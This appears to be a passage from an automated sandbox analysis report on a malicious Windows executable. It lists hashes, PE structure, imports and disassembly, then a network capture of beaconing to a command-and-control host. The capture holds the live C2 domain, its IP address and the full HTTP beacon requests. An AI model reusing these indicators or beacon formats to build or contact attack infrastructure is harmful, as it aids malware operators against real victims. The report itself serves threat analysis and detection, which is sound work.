Process:	C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1977344
Entropy (8bit):	7.384250632620979
Encrypted:	false
SSDEEP:	49152:9Eln+8YPyZc6wkQbPVqlC8m5saKHaFg3:mJ+lyZKjVJDWaA
MD5:	64B3CA21D783CFB2DDE3FFBAFBF1797F
SHA1:	822549C0B397FEEB5105C1EBFE570DDF685C926B
SHA-256:	91167E5876C370F49654A0749590B162B9432108940F84CF77690E26E367955C
SHA-512:	D6BE88CE1EA5D6A54C07B56A8CB682FAE729CFAAE9758ED3CADA42988C89A8A9B7DC038E754B06F8CB737602FE1D3B941C067E7E166C10A30E6541BEE57EFDE3
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 81% Antivirus: Virustotal, Detection: 75%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...D.ba.....................Z........... ........@.. ....................................@.....................................K....`............................................................................... ............... ..H............text........ ...................... ..`.sdata...R.......T..................@....rsrc........`.......&..............@..@.reloc...............*..............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.338744545542856
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 50.01% Win32 Executable (generic) a (10002005/4) 49.97% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	PMDfwr7Jal.exe
File size:	2'294'457 bytes
MD5:	e1d86c6e52c904e9af8bc1351a66a131
SHA1:	482741be08bba2ab5e3fd9d181a1dc8539121f8d
SHA256:	ca851ef16c519ecf785610e2db584a5b79f41c76916b28164e580e4fa1238715
SHA512:	fed19d61d82ef7bc267ee42413a5a6fa07f0cca4f1ca1f42ef4c294aef6bb9424b2b2dc9ea4cf0040dff5f526eaa5b07f561decf9a7310b93474657d718676b4
SSDEEP:	49152:UbA30bEln+8YPyZc6wkQbPVqlC8m5saKHaFg35:UbUJ+lyZKjVJDWaA5
TLSH:	B6B5BE017A84CE12D16A163BC5EF805447BCFD016A66CB1A7FAF335D66533A25E0E2CB
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......b`..&...&...&.....h.+.....j.......k.>.....^.$...._..0...._..5...._....../y..,.../y..#...&...*...._......._..'...._f.'...._..'..

File Icon


Icon Hash:	1515d4d4442f2d2d

Static PE Info

General

Entrypoint:	0x41ec40
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Time Stamp:	0x5FC684D7 [Tue Dec 1 18:00:55 2020 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	fcf1390e9ce472c7270447fc5c61a0c1

Entrypoint Preview

Instruction
call 00007F4738F30B59h
jmp 00007F4738F3056Dh
cmp ecx, dword ptr [0043E668h]
jne 00007F4738F306E5h
ret
jmp 00007F4738F30CDEh
int3
int3
int3
int3
int3
push ebp
mov ebp, esp
push esi
push dword ptr [ebp+08h]
mov esi, ecx
call 00007F4738F23477h
mov dword ptr [esi], 00435580h
mov eax, esi
pop esi
pop ebp
retn 0004h
and dword ptr [ecx+04h], 00000000h
mov eax, ecx
and dword ptr [ecx+08h], 00000000h
mov dword ptr [ecx+04h], 00435588h
mov dword ptr [ecx], 00435580h
ret
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
lea eax, dword ptr [ecx+04h]
mov dword ptr [ecx], 00435568h
push eax
call 00007F4738F3387Dh
pop ecx
ret
push ebp
mov ebp, esp
sub esp, 0Ch
lea ecx, dword ptr [ebp-0Ch]
call 00007F4738F2340Eh
push 0043B704h
lea eax, dword ptr [ebp-0Ch]
push eax
call 00007F4738F32F92h
int3
push ebp
mov ebp, esp
sub esp, 0Ch
lea ecx, dword ptr [ebp-0Ch]
call 00007F4738F30684h
push 0043B91Ch
lea eax, dword ptr [ebp-0Ch]
push eax
call 00007F4738F32F75h
int3
jmp 00007F4738F34FC3h
jmp dword ptr [00433260h]
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
push 00421EB0h
push dword ptr fs:[00000000h]

Rich Headers

Programming Language:

[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[C++] VS2015 UPD3.1 build 24215
[EXP] VS2015 UPD3.1 build 24215
[RES] VS2015 UPD3 build 24213
[LNK] VS2015 UPD3.1 build 24215

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x3c820	0x34	.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x3c854	0x3c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x63000	0xdfd0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x71000	0x2268	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x3aac0	0x54	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x35508	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x33000	0x260	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x3bdc4	0x120	.rdata
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x310ea	0x31200	c5bf61bbedb6ad471e9dc6266398e965	False	0.583959526081425	data	6.708075396341128	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x33000	0xa612	0xa800	7980b588d5b28128a2f3c36cabe2ce98	False	0.45284598214285715	data	5.221742709250668	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x3e000	0x23728	0x1000	201530c9e56f172adf2473053298d48f	False	0.36767578125	data	3.7088186669877685	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.didat	0x62000	0x188	0x200	c5d41d8f254f69e567595ab94266cfdc	False	0.4453125	data	3.2982538067961342	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x63000	0xdfd0	0xe000	f6c0f34fae6331b50a7ad2efc4bfefdb	False	0.6370326450892857	data	6.6367506404157535	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x71000	0x2268	0x2400	c7a942b723cb29d9c02f7c611b544b50	False	0.7681206597222222	data	6.5548620101740545	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
PNG	0x63650	0xb45	PNG image data, 93 x 302, 8-bit/color RGB, non-interlaced	English	United States	1.0027729636048528
PNG	0x64198	0x15a9	PNG image data, 186 x 604, 8-bit/color RGB, non-interlaced	English	United States	0.9363390441839495
RT_ICON	0x65748	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, resolution 2834 x 2834 px/m, 256 important colors	English	United States	0.47832369942196534
RT_ICON	0x65cb0	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, resolution 2834 x 2834 px/m, 256 important colors	English	United States	0.5410649819494585
RT_ICON	0x66558	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, resolution 2834 x 2834 px/m, 256 important colors	English	United States	0.4933368869936034
RT_ICON	0x67400	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2834 x 2834 px/m	English	United States	0.5390070921985816
RT_ICON	0x67868	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2834 x 2834 px/m	English	United States	0.41393058161350843
RT_ICON	0x68910	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2834 x 2834 px/m	English	United States	0.3479253112033195
RT_ICON	0x6aeb8	0x3d71	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	English	United States	0.9809269502193401
RT_DIALOG	0x6f588	0x286	data	English	United States	0.5092879256965944
RT_DIALOG	0x6f358	0x13a	data	English	United States	0.60828025477707
RT_DIALOG	0x6f498	0xec	data	English	United States	0.6991525423728814
RT_DIALOG	0x6f228	0x12e	data	English	United States	0.5927152317880795
RT_DIALOG	0x6eef0	0x338	data	English	United States	0.45145631067961167
RT_DIALOG	0x6ec98	0x252	data	English	United States	0.5757575757575758
RT_STRING	0x6ff68	0x1e2	data	English	United States	0.3900414937759336
RT_STRING	0x70150	0x1cc	data	English	United States	0.4282608695652174
RT_STRING	0x70320	0x1b8	data	English	United States	0.45681818181818185
RT_STRING	0x704d8	0x146	data	English	United States	0.5153374233128835
RT_STRING	0x70620	0x446	data	English	United States	0.340036563071298
RT_STRING	0x70a68	0x166	data	English	United States	0.49162011173184356
RT_STRING	0x70bd0	0x152	data	English	United States	0.5059171597633136
RT_STRING	0x70d28	0x10a	data	English	United States	0.49624060150375937
RT_STRING	0x70e38	0xbc	data	English	United States	0.6329787234042553
RT_STRING	0x70ef8	0xd6	data	English	United States	0.5747663551401869
RT_GROUP_ICON	0x6ec30	0x68	data	English	United States	0.7019230769230769
RT_MANIFEST	0x6f810	0x753	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.3957333333333333

Imports

DLL

Import

KERNEL32.dll

GetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, CreateDirectoryW, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleFileNameW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, GetCurrentProcessId, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, SetCurrentDirectoryW, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetTimeFormatW, GetDateFormatW, GetNumberFormatW, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, TerminateProcess, RtlUnwind, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, HeapReAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage, GetOEMCP, GetCommandLineA, GetEnvironmentStringsW, FreeEnvironmentStringsW, DecodePointer

gdiplus.dll

GdiplusShutdown, GdiplusStartup, GdipCreateHBITMAPFromBitmap, GdipCreateBitmapFromStreamICM, GdipCreateBitmapFromStream, GdipDisposeImage, GdipCloneImage, GdipFree, GdipAlloc

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 23, 2024 19:37:03.043258905 CET	49729	80	192.168.2.4	141.8.197.42
Mar 23, 2024 19:37:03.241436958 CET	80	49729	141.8.197.42	192.168.2.4
Mar 23, 2024 19:37:03.241524935 CET	49729	80	192.168.2.4	141.8.197.42
Mar 23, 2024 19:37:03.242341042 CET	49729	80	192.168.2.4	141.8.197.42
Mar 23, 2024 19:37:03.440687895 CET	80	49729	141.8.197.42	192.168.2.4
Mar 23, 2024 19:37:03.441196918 CET	80	49729	141.8.197.42	192.168.2.4
Mar 23, 2024 19:37:03.441231012 CET	80	49729	141.8.197.42	192.168.2.4
Mar 23, 2024 19:37:03.441346884 CET	49729	80	192.168.2.4	141.8.197.42
Mar 23, 2024 19:37:03.454030991 CET	49729	80	192.168.2.4	141.8.197.42
Mar 23, 2024 19:37:03.462558031 CET	49730	80	192.168.2.4	141.8.197.42
Mar 23, 2024 19:37:03.653825045 CET	80	49729	141.8.197.42	192.168.2.4
Mar 23, 2024 19:37:03.659029961 CET	80	49730	141.8.197.42	192.168.2.4
Mar 23, 2024 19:37:03.659204006 CET	49730	80	192.168.2.4	141.8.197.42
Mar 23, 2024 19:37:03.659291983 CET	49730	80	192.168.2.4	141.8.197.42
Mar 23, 2024 19:37:04.162386894 CET	49730	80	192.168.2.4	141.8.197.42
Mar 23, 2024 19:37:04.358313084 CET	80	49730	141.8.197.42	192.168.2.4
Mar 23, 2024 19:37:04.358849049 CET	80	49730	141.8.197.42	192.168.2.4
Mar 23, 2024 19:37:04.358928919 CET	80	49730	141.8.197.42	192.168.2.4
Mar 23, 2024 19:37:04.358990908 CET	49730	80	192.168.2.4	141.8.197.42
Mar 23, 2024 19:37:04.361541986 CET	49730	80	192.168.2.4	141.8.197.42
Mar 23, 2024 19:37:04.557368040 CET	80	49730	141.8.197.42	192.168.2.4
Mar 23, 2024 19:37:14.961548090 CET	49737	80	192.168.2.4	141.8.197.42
Mar 23, 2024 19:37:15.161113024 CET	80	49737	141.8.197.42	192.168.2.4
Mar 23, 2024 19:37:15.161196947 CET	49737	80	192.168.2.4	141.8.197.42
Mar 23, 2024 19:37:15.161585093 CET	49737	80	192.168.2.4	141.8.197.42
Mar 23, 2024 19:37:15.646684885 CET	49737	80	192.168.2.4	141.8.197.42
Mar 23, 2024 19:37:15.846551895 CET	80	49737	141.8.197.42	192.168.2.4
Mar 23, 2024 19:37:15.846740961 CET	80	49737	141.8.197.42	192.168.2.4
Mar 23, 2024 19:37:15.846801043 CET	80	49737	141.8.197.42	192.168.2.4
Mar 23, 2024 19:37:15.848597050 CET	49737	80	192.168.2.4	141.8.197.42
Mar 23, 2024 19:37:15.848618984 CET	49737	80	192.168.2.4	141.8.197.42
Mar 23, 2024 19:37:15.851085901 CET	49738	80	192.168.2.4	141.8.197.42
Mar 23, 2024 19:37:16.044748068 CET	80	49737	141.8.197.42	192.168.2.4
Mar 23, 2024 19:37:16.046720982 CET	80	49738	141.8.197.42	192.168.2.4
Mar 23, 2024 19:37:16.046818972 CET	49738	80	192.168.2.4	141.8.197.42
Mar 23, 2024 19:37:16.046979904 CET	49738	80	192.168.2.4	141.8.197.42
Mar 23, 2024 19:37:16.243067980 CET	80	49738	141.8.197.42	192.168.2.4
Mar 23, 2024 19:37:16.243851900 CET	80	49738	141.8.197.42	192.168.2.4
Mar 23, 2024 19:37:16.243916988 CET	80	49738	141.8.197.42	192.168.2.4
Mar 23, 2024 19:37:16.243978024 CET	49738	80	192.168.2.4	141.8.197.42
Mar 23, 2024 19:37:16.244139910 CET	49738	80	192.168.2.4	141.8.197.42
Mar 23, 2024 19:37:16.439902067 CET	80	49738	141.8.197.42	192.168.2.4
Mar 23, 2024 19:37:23.683702946 CET	49739	80	192.168.2.4	141.8.197.42
Mar 23, 2024 19:37:23.887196064 CET	80	49739	141.8.197.42	192.168.2.4
Mar 23, 2024 19:37:23.887284994 CET	49739	80	192.168.2.4	141.8.197.42
Mar 23, 2024 19:37:23.887697935 CET	49739	80	192.168.2.4	141.8.197.42
Mar 23, 2024 19:37:24.090164900 CET	80	49739	141.8.197.42	192.168.2.4
Mar 23, 2024 19:37:24.090712070 CET	80	49739	141.8.197.42	192.168.2.4
Mar 23, 2024 19:37:24.090755939 CET	80	49739	141.8.197.42	192.168.2.4
Mar 23, 2024 19:37:24.092592955 CET	49739	80	192.168.2.4	141.8.197.42
Mar 23, 2024 19:37:24.092608929 CET	49739	80	192.168.2.4	141.8.197.42
Mar 23, 2024 19:37:24.094661951 CET	49740	80	192.168.2.4	141.8.197.42
Mar 23, 2024 19:37:24.292227983 CET	80	49740	141.8.197.42	192.168.2.4
Mar 23, 2024 19:37:24.293571949 CET	49740	80	192.168.2.4	141.8.197.42
Mar 23, 2024 19:37:24.293693066 CET	49740	80	192.168.2.4	141.8.197.42
Mar 23, 2024 19:37:24.294159889 CET	80	49739	141.8.197.42	192.168.2.4
Mar 23, 2024 19:37:24.492063999 CET	80	49740	141.8.197.42	192.168.2.4
Mar 23, 2024 19:37:24.493395090 CET	80	49740	141.8.197.42	192.168.2.4
Mar 23, 2024 19:37:24.493408918 CET	80	49740	141.8.197.42	192.168.2.4
Mar 23, 2024 19:37:24.493510962 CET	49740	80	192.168.2.4	141.8.197.42
Mar 23, 2024 19:37:24.493676901 CET	49740	80	192.168.2.4	141.8.197.42
Mar 23, 2024 19:37:24.691417933 CET	80	49740	141.8.197.42	192.168.2.4
Mar 23, 2024 19:37:31.289845943 CET	49741	80	192.168.2.4	141.8.197.42
Mar 23, 2024 19:37:31.486437082 CET	80	49741	141.8.197.42	192.168.2.4
Mar 23, 2024 19:37:31.486557007 CET	49741	80	192.168.2.4	141.8.197.42
Mar 23, 2024 19:37:31.486927032 CET	49741	80	192.168.2.4	141.8.197.42
Mar 23, 2024 19:37:31.684145927 CET	80	49741	141.8.197.42	192.168.2.4
Mar 23, 2024 19:37:31.684683084 CET	80	49741	141.8.197.42	192.168.2.4
Mar 23, 2024 19:37:31.684765100 CET	80	49741	141.8.197.42	192.168.2.4
Mar 23, 2024 19:37:31.685545921 CET	49741	80	192.168.2.4	141.8.197.42
Mar 23, 2024 19:37:31.686475992 CET	49741	80	192.168.2.4	141.8.197.42
Mar 23, 2024 19:37:31.688549042 CET	49742	80	192.168.2.4	141.8.197.42
Mar 23, 2024 19:37:31.883316040 CET	80	49741	141.8.197.42	192.168.2.4
Mar 23, 2024 19:37:31.884967089 CET	80	49742	141.8.197.42	192.168.2.4
Mar 23, 2024 19:37:31.885070086 CET	49742	80	192.168.2.4	141.8.197.42
Mar 23, 2024 19:37:31.885190010 CET	49742	80	192.168.2.4	141.8.197.42
Mar 23, 2024 19:37:32.081207991 CET	80	49742	141.8.197.42	192.168.2.4
Mar 23, 2024 19:37:32.081984043 CET	80	49742	141.8.197.42	192.168.2.4
Mar 23, 2024 19:37:32.081995964 CET	80	49742	141.8.197.42	192.168.2.4
Mar 23, 2024 19:37:32.082036018 CET	49742	80	192.168.2.4	141.8.197.42
Mar 23, 2024 19:37:32.082190990 CET	49742	80	192.168.2.4	141.8.197.42
Mar 23, 2024 19:37:32.277853012 CET	80	49742	141.8.197.42	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 23, 2024 19:37:02.861793995 CET	50245	53	192.168.2.4	1.1.1.1
Mar 23, 2024 19:37:03.036190987 CET	53	50245	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Mar 23, 2024 19:37:02.861793995 CET	192.168.2.4	1.1.1.1	0xed8c	Standard query (0)	a0583448.xsph.ru	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Mar 23, 2024 19:37:03.036190987 CET	1.1.1.1	192.168.2.4	0xed8c	No error (0)	a0583448.xsph.ru		141.8.197.42	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

a0583448.xsph.ru

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49729	141.8.197.42	80	7964	C:\Windows\System32\wbem\schannel\WmiPrvSE.exe

Timestamp	Bytes transferred	Direction	Data
Mar 23, 2024 19:37:03.242341042 CET	538	OUT	GET /HttpCpu.php?t9XuiM8Z=c9QFyXales&bCcrpzpHaLyQDva2=SBrtO0pOu&9pYw=qiwrhpF&c43ad04a366e3e13d187a2f4f0fffdd3=7dce47940ffc35c44d1d7554ed3fdd89&4405def633a99e58044aae91701cfdda=AMkVmY1cDNihjYmNDZmFzYjFTOwU2Y3YDZ4QjMjRWMzIWNxIWO1M2N&t9XuiM8Z=c9QFyXales&bCcrpzpHaLyQDva2=SBrtO0pOu&9pYw=qiwrhpF HTTP/1.1 Accept: / Content-Type: text/css User-Agent: Mozilla/5.0 (Linux; Android 6.0; HTC One M9 Build/MRA58K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.98 Mobile Safari/537.3 Host: a0583448.xsph.ru Connection: Keep-Alive
Mar 23, 2024 19:37:03.441196918 CET	705	IN	HTTP/1.1 400 Bad Request Server: openresty Date: Sat, 23 Mar 2024 18:37:03 GMT Content-Type: text/html Content-Length: 556 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49730	141.8.197.42	80	7964	C:\Windows\System32\wbem\schannel\WmiPrvSE.exe

Timestamp	Bytes transferred	Direction	Data
Mar 23, 2024 19:37:03.659291983 CET	514	OUT	GET /HttpCpu.php?t9XuiM8Z=c9QFyXales&bCcrpzpHaLyQDva2=SBrtO0pOu&9pYw=qiwrhpF&c43ad04a366e3e13d187a2f4f0fffdd3=7dce47940ffc35c44d1d7554ed3fdd89&4405def633a99e58044aae91701cfdda=AMkVmY1cDNihjYmNDZmFzYjFTOwU2Y3YDZ4QjMjRWMzIWNxIWO1M2N&t9XuiM8Z=c9QFyXales&bCcrpzpHaLyQDva2=SBrtO0pOu&9pYw=qiwrhpF HTTP/1.1 Accept: / Content-Type: text/css User-Agent: Mozilla/5.0 (Linux; Android 6.0; HTC One M9 Build/MRA58K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.98 Mobile Safari/537.3 Host: a0583448.xsph.ru
Mar 23, 2024 19:37:04.162386894 CET	514	OUT	GET /HttpCpu.php?t9XuiM8Z=c9QFyXales&bCcrpzpHaLyQDva2=SBrtO0pOu&9pYw=qiwrhpF&c43ad04a366e3e13d187a2f4f0fffdd3=7dce47940ffc35c44d1d7554ed3fdd89&4405def633a99e58044aae91701cfdda=AMkVmY1cDNihjYmNDZmFzYjFTOwU2Y3YDZ4QjMjRWMzIWNxIWO1M2N&t9XuiM8Z=c9QFyXales&bCcrpzpHaLyQDva2=SBrtO0pOu&9pYw=qiwrhpF HTTP/1.1 Accept: / Content-Type: text/css User-Agent: Mozilla/5.0 (Linux; Android 6.0; HTC One M9 Build/MRA58K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.98 Mobile Safari/537.3 Host: a0583448.xsph.ru
Mar 23, 2024 19:37:04.358849049 CET	705	IN	HTTP/1.1 400 Bad Request Server: openresty Date: Sat, 23 Mar 2024 18:37:04 GMT Content-Type: text/html Content-Length: 556 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 